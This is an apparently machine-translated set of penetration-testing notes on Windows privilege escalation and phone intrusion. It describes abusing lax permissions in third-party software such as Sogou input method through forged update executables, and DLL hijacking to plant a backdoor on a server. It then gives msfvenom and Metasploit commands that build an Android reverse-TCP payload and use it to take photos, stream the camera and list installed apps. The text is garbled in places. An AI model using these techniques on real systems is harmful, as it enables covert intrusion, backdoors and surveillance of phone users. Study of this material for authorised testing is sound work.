<> Third party rights

You can enter the registry to check which software is installed

<> Sogou input method to raise rights

principle : The authority of Sogou input method is not strict , When Sogou input method is installed by default , Permission is given too much ,everyone( All ) jurisdiction ( Absolute control )

By forgery exe file , For example, update the program , When the other party updates the software or content , Automatic execution written in advance bat script (quick batch)

FileZilla,ftp, Thunder , Sogou input method ,vnc, Old version 360 And other special versions of third-party software

<>LPK hijack (dll hijack )

One requires the program itself dll, Copy one according to the function dll

The other is to directly generate a malicious dll, Put it in a directory , It will take effect after the other party restarts the program

Preconditions : The other party often uses this software ( To restart the software ), The other party opens remote desktop ( Port may be modified , stay shell Just take a look inside )

After the back door takes effect , Remote control connection to the other server , In the login interface 5 second shift Press the key to call the command set in advance after pasting , A similar control panel pops up after verifying the password , Can operate on the server , And cmd Permission is system

<> Penetration testing of Android Phones

kali in msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 R >

After generation, you can Android Killer Medium processing

Software name

stay msf Medium setting payload

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp


set LPORT 4444


photograph :webcam_snap

Turn on the camera :webcam_stream -i 1

View installed app:app_list